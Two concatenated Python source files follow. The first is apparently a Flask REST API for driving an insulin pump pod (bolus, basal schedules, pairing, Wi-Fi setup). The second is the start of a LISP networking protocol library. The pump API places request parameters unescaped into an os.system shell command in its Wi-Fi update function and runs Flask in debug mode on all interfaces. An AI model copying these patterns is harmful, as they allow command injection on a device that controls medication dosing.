DATA_PATH + OMNIPY_PACKET_LOGFILE + archive_suffix + LOGFILE_SUFFIX)
if os.path.isfile(DATA_PATH + OMNIPY_LOGFILE + LOGFILE_SUFFIX):
os.rename(DATA_PATH + OMNIPY_LOGFILE + LOGFILE_SUFFIX,
DATA_PATH + OMNIPY_LOGFILE + archive_suffix + LOGFILE_SUFFIX)
return archive_name
except:
logger.exception("Error while archiving existing pod")
def _get_battery_level():
global g_battery_checker
return g_battery_checker.get_measurement()
def _get_next_pod_address():
try:
try:
# Increment the low nibble of the last-activated address.
with open(DATA_PATH + LAST_ACTIVATED_FILE, "r") as lastfile:
addr = int(lastfile.readline(), 16)
blast = (addr & 0x0000000f) + 1
addr = (addr & 0xfffffff0) | (blast & 0x0000000f)
except:
# No previously activated pod: derive an initial address from this
# machine's MAC address, prefixed with 0x34.
mac = get_mac()
b0 = 0x34
b1 = (mac >> 12) & 0xff
b2 = (mac >> 4) & 0xff
b3 = (mac << 4) & 0xf0
addr = (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
addr = addr | 0x00000008
return addr
except:
logger.exception("Error while getting next radio address")
def _save_activated_pod_address(addr):
try:
with open(DATA_PATH + LAST_ACTIVATED_FILE, "w") as lastfile:
lastfile.write(hex(addr))
except:
logger.exception("Error while storing activated radio address")
def _create_response(success, response, pod_status=None):
if pod_status is None:
pod_status = {}
elif pod_status.__class__ != dict:
pod_status = pod_status.__dict__
if response is None:
response = {}
elif response.__class__ != dict:
response = response.__dict__
return json.dumps({"success": success,
"response": response,
"status": pod_status,
"datetime": time.time(),
"api": {"version_major": API_VERSION_MAJOR, "version_minor": API_VERSION_MINOR,
"version_revision": API_VERSION_REVISION, "version_build": API_VERSION_BUILD},
"battery_level": _get_battery_level()
}, indent=4, sort_keys=True)
def _verify_auth(request_obj):
global g_deny
try:
if g_deny:
raise RestApiException("Pdm is shutting down")
i = request_obj.args.get("i")
a = request_obj.args.get("auth")
if i is None or a is None:
raise RestApiException("Authentication failed")
iv = base64.b64decode(i)
auth = base64.b64decode(a)
cipher = AES.new(g_key, AES.MODE_CBC, iv)
token = cipher.decrypt(auth)
with g_token_lock:
if token in g_tokens:
g_tokens.remove(token)
else:
raise RestApiException("Invalid authentication token")
except RestApiException:
logger.exception("Authentication error")
raise
except Exception:
logger.exception("Error during verify_auth")
raise
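# A minimal client-side sketch of the handshake this function implies,
# assuming the client holds the same key stored in DATA_PATH + KEY_FILE.
# The token comes from create_token(); everything else below is
# illustrative, not part of this module:
#
#   import os, base64
#   from Crypto.Cipher import AES
#
#   def make_auth_args(key, token_b64):
#       token = base64.b64decode(token_b64)  # 16-byte token, one AES block
#       iv = os.urandom(16)                  # fresh IV per request
#       auth = AES.new(key, AES.MODE_CBC, iv).encrypt(token)
#       return {"i": base64.b64encode(iv), "auth": base64.b64encode(auth)}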
def _adjust_time(adjustment):
logger.info("Adjusting local time by %d ms" % adjustment)
pdm = _get_pdm()
if pdm is not None:
pdm.set_time_adjustment(adjustment / 1000)
def _api_result(result_lambda, generic_err_message):
global g_time_diffs, g_oldest_diff
try:
if g_deny:
raise RestApiException("Pdm is shutting down")
# if request.args.get('req_t') is not None:
# req_time = int(request.args.get('req_t'))
# local_time = int(time.time() * 1000)
# difference_ms = (req_time - local_time)
# if g_oldest_diff is None:
# g_oldest_diff = local_time
#
# if g_oldest_diff - local_time > 300:
# g_time_diffs = [difference_ms]
# g_oldest_diff = local_time
# else:
# g_time_diffs.append(difference_ms)
#
# if len(g_time_diffs) > 3:
# diff_avg = sum(g_time_diffs) / len(g_time_diffs)
# g_time_diffs = []
#
# if diff_avg > 30000 or diff_avg < -30000:
# _adjust_time(diff_avg)
return _create_response(True,
response=result_lambda(), pod_status=_get_pod())
except RestApiException as rae:
return _create_response(False, response=rae, pod_status=_get_pod())
except Exception as e:
logger.exception(generic_err_message)
return _create_response(False, response=e, pod_status=_get_pod())
def _get_pdm_address(timeout):
packet = None
with PdmLock():
# Acquire the radio before entering the try block; otherwise a failure
# in _get_pdm() leaves "radio" unbound when the finally clause runs.
radio = _get_pdm().get_radio()
try:
radio.stop()
packet = radio.get_packet(timeout)
finally:
radio.disconnect()
radio.start()
if packet is None:
raise RestApiException("No packet received")
return packet.address
def archive_pod():
_verify_auth(request)
pod = Pod()
_archive_pod()
_set_pod(pod)
def ping():
return {"pong": None}
def create_token():
token = bytes(os.urandom(16))
with g_token_lock:
g_tokens.append(token)
return {"token": base64.b64encode(token)}
def check_password():
_verify_auth(request)
def get_pdm_address():
_verify_auth(request)
timeout = 30000
if request.args.get('timeout') is not None:
timeout = int(request.args.get('timeout')) * 1000
if timeout > 30000:
raise RestApiException("Timeout cannot be more than 30 seconds")
address = _get_pdm_address(timeout)
return {"radio_address": address, "radio_address_hex": "%8X" % address}
def new_pod():
_verify_auth(request)
pod = Pod()
if request.args.get('id_lot') is not None:
pod.id_lot = int(request.args.get('id_lot'))
if request.args.get('id_t') is not None:
pod.id_t = int(request.args.get('id_t'))
if request.args.get('radio_address') is not None:
pod.radio_address = int(request.args.get('radio_address'))
else:
pod.radio_address = 0
if pod.radio_address == 0:
pod.radio_address = _get_pdm_address(45000)
_archive_pod()
_set_pod(pod)
def pair_pod():
_verify_auth(request)
pod = _get_pod()
if pod.state_progress >= PodProgress.Running:
pod = Pod()
_archive_pod()
_set_pod(pod)
pdm = _get_pdm()
req_address = _get_next_pod_address()
utc_offset = int(request.args.get('utc'))
pdm.pair_pod(req_address, utc_offset=utc_offset)
_save_activated_pod_address(req_address)
def activate_pod():
_verify_auth(request)
pdm = _get_pdm()
pdm.activate_pod()
def start_pod():
_verify_auth(request)
pdm = _get_pdm()
schedule=[]
for i in range(0,48):
rate = Decimal(request.args.get("h"+str(i)))
schedule.append(rate)
pdm.inject_and_start(schedule)
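# The schedule above is one basal rate per half-hour slot, so a request to
# this endpoint is expected to carry query parameters h0 through h47 (plus
# the i/auth parameters checked by _verify_auth()). A hypothetical call:
#
#   REST_URL_START_POD + "?h0=0.55&h1=0.55&...&h47=0.60&i=<iv>&auth=<auth>"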
def _int_parameter(obj, parameter):
if request.args.get(parameter) is not None:
obj.__dict__[parameter] = int(request.args.get(parameter))
return True
return False
def _float_parameter(obj, parameter):
if request.args.get(parameter) is not None:
obj.__dict__[parameter] = float(request.args.get(parameter))
return True
return False
def _bool_parameter(obj, parameter):
if request.args.get(parameter) is not None:
val = str(request.args.get(parameter))
bval = False
if val == "1" or val.capitalize() == "TRUE":
bval = True
obj.__dict__[parameter] = bval
return True
return False
def set_pod_parameters():
_verify_auth(request)
pod = _get_pod()
try:
reset_nonce = False
if _int_parameter(pod, "id_lot"):
reset_nonce = True
if _int_parameter(pod, "id_t"):
reset_nonce = True
if reset_nonce:
pod.nonce_last = None
pod.nonce_seed = 0
if _int_parameter(pod, "radio_address"):
pod.radio_packet_sequence = 0
pod.radio_message_sequence = 0
_float_parameter(pod, "var_utc_offset")
_float_parameter(pod, "var_maximum_bolus")
_float_parameter(pod, "var_maximum_temp_basal_rate")
_float_parameter(pod, "var_alert_low_reservoir")
_int_parameter(pod, "var_alert_replace_pod")
_bool_parameter(pod, "var_notify_bolus_start")
_bool_parameter(pod, "var_notify_bolus_cancel")
_bool_parameter(pod, "var_notify_temp_basal_set")
_bool_parameter(pod, "var_notify_temp_basal_cancel")
_bool_parameter(pod, "var_notify_basal_schedule_change")
except:
raise
finally:
pod.Save()
def get_rl_info():
_verify_auth(request)
r = RileyLink()
return r.get_info()
def get_status():
_verify_auth(request)
t = request.args.get('type')
if t is not None:
req_type = int(t)
else:
req_type = 0
pdm = _get_pdm()
id = pdm.update_status(req_type)
return {"row_id":id}
def deactivate_pod():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.deactivate_pod()
_archive_pod()
return {"row_id":id}
def bolus():
_verify_auth(request)
pdm = _get_pdm()
amount = Decimal(request.args.get('amount'))
id = pdm.bolus(amount)
return {"row_id":id}
def cancel_bolus():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.cancel_bolus()
return {"row_id":id}
def set_temp_basal():
_verify_auth(request)
pdm = _get_pdm()
amount = Decimal(request.args.get('amount'))
hours = Decimal(request.args.get('hours'))
id = pdm.set_temp_basal(amount, hours, False)
return {"row_id":id}
def cancel_temp_basal():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.cancel_temp_basal()
return {"row_id":id}
def set_basal_schedule():
_verify_auth(request)
pdm = _get_pdm()
schedule=[]
for i in range(0,48):
rate = Decimal(request.args.get("h"+str(i)))
schedule.append(rate)
utc_offset = int(request.args.get("utc"))
pdm.pod.var_utc_offset = utc_offset
id = pdm.set_basal_schedule(schedule)
return {"row_id":id}
def is_pdm_busy():
pdm = _get_pdm()
return {"busy": pdm.is_busy()}
def acknowledge_alerts():
_verify_auth(request)
mask = Decimal(request.args.get('alertmask'))
pdm = _get_pdm()
id = pdm.acknowledge_alerts(mask)
return {"row_id":id}
def silence_alarms():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.hf_silence_will_fall()
return {"row_id":id}
def shutdown():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("sudo shutdown -h")
return {"shutdown": time.time()}
def restart():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("sudo shutdown -r")
return {"restart": time.time()}
def update_omnipy():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("/bin/bash /home/pi/omnipy/scripts/pi-update.sh")
return {"update started": time.time()}
def update_wlan():
global g_deny
_verify_auth(request)
ssid = str(request.args.get('ssid'))
pw = str(request.args.get('pw'))
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system('/bin/bash /home/pi/omnipy/scripts/pi-setwifi.sh "%s" "%s"' % (ssid, pw))
return {"update started": time.time()}
def update_password():
global g_key
_verify_auth(request)
iv = base64.b64decode(request.args.get("i"))
pw_enc = base64.b64decode(request.args.get('pw'))
cipher = AES.new(g_key, AES.MODE_CBC, iv)
new_key = cipher.decrypt(pw_enc)
with open(DATA_PATH + KEY_FILE, "wb") as key_file:
key_file.write(new_key)
g_key = new_key
@app.route("/")
def main_page():
try:
return app.send_static_file("omnipy.html")
except:
logger.exception("Error while serving root file")
@app.route('/content/<path:path>')
def send_content(path):
try:
return send_from_directory("static", path)
except:
logger.exception("Error while serving static file from %s" % path)
@app.route(REST_URL_PING)
def a00():
return _api_result(lambda: ping(), "Failure while pinging")
@app.route(REST_URL_TOKEN)
def a01():
return _api_result(lambda: create_token(), "Failure while creating token")
@app.route(REST_URL_CHECK_PASSWORD)
def a02():
return _api_result(lambda: check_password(), "Failure while verifying password")
@app.route(REST_URL_GET_PDM_ADDRESS)
def a03():
return _api_result(lambda: get_pdm_address(), "Failure while reading address from PDM")
@app.route(REST_URL_NEW_POD)
def a04():
return _api_result(lambda: new_pod(), "Failure while creating a new pod")
@app.route(REST_URL_SET_POD_PARAMETERS)
def a05():
return _api_result(lambda: set_pod_parameters(), "Failure while setting parameters")
@app.route(REST_URL_RL_INFO)
def a06():
return _api_result(lambda: get_rl_info(), "Failure while getting RL info")
@app.route(REST_URL_STATUS)
def a07():
return _api_result(lambda: get_status(), "Failure while getting pod status")
@app.route(REST_URL_ACK_ALERTS)
def a08():
return _api_result(lambda: acknowledge_alerts(), "Failure while executing acknowledge alerts")
@app.route(REST_URL_DEACTIVATE_POD)
def a09():
return _api_result(lambda: deactivate_pod(), "Failure while executing deactivate pod")
@app.route(REST_URL_BOLUS)
def a10():
return _api_result(lambda: bolus(), "Failure while executing bolus")
@app.route(REST_URL_CANCEL_BOLUS)
def a11():
return _api_result(lambda: cancel_bolus(), "Failure while executing cancel bolus")
@app.route(REST_URL_SET_TEMP_BASAL)
def a12():
return _api_result(lambda: set_temp_basal(), "Failure while executing set temp basal")
@app.route(REST_URL_CANCEL_TEMP_BASAL)
def a13():
return _api_result(lambda: cancel_temp_basal(), "Failure while executing cancel temp basal")
@app.route(REST_URL_PDM_BUSY)
def a14():
return _api_result(lambda: is_pdm_busy(), "Failure while verifying if pdm is busy")
@app.route(REST_URL_OMNIPY_SHUTDOWN)
def a15():
return _api_result(lambda: shutdown(), "Failure while executing shutdown")
@app.route(REST_URL_OMNIPY_RESTART)
def a16():
return _api_result(lambda: restart(), "Failure while executing reboot")
@app.route(REST_URL_PAIR_POD)
def a165():
return _api_result(lambda: pair_pod(), "Failure while pairing the pod")
@app.route(REST_URL_ACTIVATE_POD)
def a17():
return _api_result(lambda: activate_pod(), "Failure while activating the pod")
@app.route(REST_URL_START_POD)
def a18():
return _api_result(lambda: start_pod(), "Failure while starting a newly activated pod")
@app.route(REST_URL_SET_BASAL_SCHEDULE)
def a19():
return _api_result(lambda: set_basal_schedule(), "Failure while setting a basal schedule")
@app.route(REST_URL_ARCHIVE_POD)
def a20():
return _api_result(lambda: archive_pod(), "Failure while archiving pod")
@app.route(REST_URL_OMNIPY_UPDATE)
def a21():
return _api_result(lambda: update_omnipy(), "Failure while executing software update")
@app.route(REST_URL_OMNIPY_WIFI)
def a22():
return _api_result(lambda: update_wlan(), "Failure while updating wifi parameters")
@app.route(REST_URL_OMNIPY_CHANGE_PASSWORD)
def a23():
return _api_result(lambda: update_password(), "Failure while changing omnipy password")
@app.route(REST_URL_SILENCE_ALARMS)
def a24():
return _api_result(lambda: silence_alarms(), "Failure while silencing alarms")
def _run_flask():
try:
app.run(host='0.0.0.0', port=4444, debug=True, use_reloader=False)
except:
logger.exception("Error while running rest api, exiting")
def _exit_with_grace(a, b):
try:
global g_deny
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(5)
_flush_handlers(getLogger())
_flush_handlers(get_packet_logger())
except:
logger.exception("error during graceful shutdown")
exit(0)
if __name__ == '__main__':
logger.info("Rest api is starting")
try:
with open(DATA_PATH + KEY_FILE, "rb") as keyfile:
g_key = keyfile.read(32)
except IOError:
logger.exception("Error while reading keyfile. Did you forget to set a password?")
raise
try:
os.system("sudo systemctl restart systemd-timesyncd && sudo systemctl daemon-reload")
except:
logger.exception("Error while reloading timesync daemon")
signal.signal(signal.SIGTERM, _exit_with_grace)
t = Thread(target=_run_flask)
t.setDaemon(True)
t.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
_exit_with_grace(0, 0)
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
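#
# For example (hypothetical shapes, per the comment above): an entry keyed
# by Map-Request nonce holds a 4-slot array indexed by key-id, and the
# encap/decap caches are keyed by "<rloc>:<port>" strings:
#
#   lisp_crypto_keys_by_nonce[0x1234] = [None, keys_for_key_id_1, None, None]
#   lisp_crypto_keys_by_rloc_encap["10.0.0.1:4341"] = [None, keys, None, None]
#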
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
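#
# For example (hypothetical): fragments of a datagram with IP ident 0x1234
# accumulate as lisp_reassembly_queue[0x1234] = [frag1, frag2, ...] until
# all fragments have arrived.
#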
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace processing error called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
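#
# A hypothetical entry, using the lisp_address() signature seen elsewhere
# in this file (afi, address-string, mask-length, instance-id):
#
#   lisp_glean_mappings.append({
#       "eid-prefix" : lisp_address(LISP_AFI_IPV4, "10.0.0.0", 8, 0),
#       "rloc-prefix": lisp_address(LISP_AFI_IPV4, "192.168.0.0", 16, 0),
#       "instance-id": [1000, 1000]})
#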
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 150
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
